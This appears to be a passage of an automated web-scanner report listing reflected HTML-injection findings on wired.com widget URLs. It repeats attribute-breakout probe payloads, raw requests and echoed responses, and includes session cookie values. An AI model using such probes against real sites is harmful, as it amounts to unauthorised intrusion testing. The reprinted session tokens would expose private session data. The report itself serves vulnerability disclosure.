The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bbe51"><a>c45b8c7122 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ajaxbbe51"><a>c45b8c7122/widgets/related/content/blogPost/magazine_39648 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29388 Vary: Accept-Encoding Cache-Control: max-age=232 Expires: Mon, 22 Nov 2010 01:14:22 GMT Date: Mon, 22 Nov 2010 01:10:30 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_ajaxbbe51"><a>c45b8c7122 ss_widgets c_related"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 934e2"><a>e80de08ba2a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ajax/widgets934e2"><a>e80de08ba2a/related/content/blogPost/magazine_39648 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29390 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:14:55 GMT Date: Mon, 22 Nov 2010 01:10:55 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_ajax ss_widgets934e2"><a>e80de08ba2a c_related"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c6a5"><a>1a9008494ce was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ajax/widgets/related6c6a5"><a>1a9008494ce/content/blogPost/magazine_39648 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29390 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:15:13 GMT Date: Mon, 22 Nov 2010 01:11:13 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_ajax ss_widgets c_related6c6a5"><a>1a9008494ce"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc70a"><a>3b04f1e36da was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ajaxfc70a"><a>3b04f1e36da/widgets/related/content/blogPost/playbook_3021 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29389 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:14:34 GMT Date: Mon, 22 Nov 2010 01:10:34 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_ajaxfc70a"><a>3b04f1e36da ss_widgets c_related"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d30b"><a>fc5601b0c19 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ajax/widgets5d30b"><a>fc5601b0c19/related/content/blogPost/playbook_3021 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29389 Vary: Accept-Encoding Cache-Control: max-age=236 Expires: Mon, 22 Nov 2010 01:14:53 GMT Date: Mon, 22 Nov 2010 01:10:57 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_ajax ss_widgets5d30b"><a>fc5601b0c19 c_related"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f817"><a>9b3c8b9b37f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ajax/widgets/related4f817"><a>9b3c8b9b37f/content/blogPost/playbook_3021 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29389 Vary: Accept-Encoding Cache-Control: max-age=225 Expires: Mon, 22 Nov 2010 01:15:01 GMT Date: Mon, 22 Nov 2010 01:11:16 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_ajax ss_widgets c_related4f817"><a>9b3c8b9b37f"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3c31"><a>f807e40c9a9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ajaxb3c31"><a>f807e40c9a9/widgets/related/content/blogPost/reviews_25843 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29389 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:14:23 GMT Date: Mon, 22 Nov 2010 01:10:23 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_ajaxb3c31"><a>f807e40c9a9 ss_widgets c_related"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 310b1"><a>8982e2d5c82 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ajax/widgets310b1"><a>8982e2d5c82/related/content/blogPost/reviews_25843 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29389 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:14:51 GMT Date: Mon, 22 Nov 2010 01:10:51 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_ajax ss_widgets310b1"><a>8982e2d5c82 c_related"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2273e"><a>e3e8aa7828e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ajax/widgets/related2273e"><a>e3e8aa7828e/content/blogPost/reviews_25843 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29389 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:15:10 GMT Date: Mon, 22 Nov 2010 01:11:10 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_ajax ss_widgets c_related2273e"><a>e3e8aa7828e"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e10a5"><a>295271ef989 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ajaxe10a5"><a>295271ef989/widgets/related/content/blogPost/threatlevel_20877 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29393 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:14:25 GMT Date: Mon, 22 Nov 2010 01:10:25 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_ajaxe10a5"><a>295271ef989 ss_widgets c_related"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9dffe"><a>cc5a2c835a1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ajax/widgets9dffe"><a>cc5a2c835a1/related/content/blogPost/threatlevel_20877 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29393 Vary: Accept-Encoding Cache-Control: max-age=235 Expires: Mon, 22 Nov 2010 01:14:45 GMT Date: Mon, 22 Nov 2010 01:10:50 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_ajax ss_widgets9dffe"><a>cc5a2c835a1 c_related"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e38f1"><a>6244b533a3a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ajax/widgets/relatede38f1"><a>6244b533a3a/content/blogPost/threatlevel_20877 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29393 Vary: Accept-Encoding Cache-Control: max-age=234 Expires: Mon, 22 Nov 2010 01:15:02 GMT Date: Mon, 22 Nov 2010 01:11:08 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_ajax ss_widgets c_relatede38f1"><a>6244b533a3a"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83ec0"><a>87032be8af7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ajax83ec0"><a>87032be8af7/widgets/related/content/blogPost/threatlevel_20913 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29393 Vary: Accept-Encoding Cache-Control: max-age=230 Expires: Mon, 22 Nov 2010 01:14:06 GMT Date: Mon, 22 Nov 2010 01:10:16 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_ajax83ec0"><a>87032be8af7 ss_widgets c_related"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dfa0d"><a>6a79b0a2118 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ajax/widgetsdfa0d"><a>6a79b0a2118/related/content/blogPost/threatlevel_20913 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29393 Vary: Accept-Encoding Cache-Control: max-age=220 Expires: Mon, 22 Nov 2010 01:14:31 GMT Date: Mon, 22 Nov 2010 01:10:51 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_ajax ss_widgetsdfa0d"><a>6a79b0a2118 c_related"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ced2f"><a>d31ee7a0ba1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ajax/widgets/relatedced2f"><a>d31ee7a0ba1/content/blogPost/threatlevel_20913 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29393 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:15:08 GMT Date: Mon, 22 Nov 2010 01:11:08 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_ajax ss_widgets c_relatedced2f"><a>d31ee7a0ba1"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload abb42"><a>82cb0a5692c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ajaxabb42"><a>82cb0a5692c/widgets/related/content/blogPost/threatlevel_7588 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29392 Vary: Accept-Encoding Cache-Control: max-age=237 Expires: Mon, 22 Nov 2010 01:14:27 GMT Date: Mon, 22 Nov 2010 01:10:30 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_ajaxabb42"><a>82cb0a5692c ss_widgets c_related"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97b1b"><a>6f0f8c7e998 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ajax/widgets97b1b"><a>6f0f8c7e998/related/content/blogPost/threatlevel_7588 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29392 Vary: Accept-Encoding Cache-Control: max-age=225 Expires: Mon, 22 Nov 2010 01:14:41 GMT Date: Mon, 22 Nov 2010 01:10:56 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_ajax ss_widgets97b1b"><a>6f0f8c7e998 c_related"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f606f"><a>222e926617f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
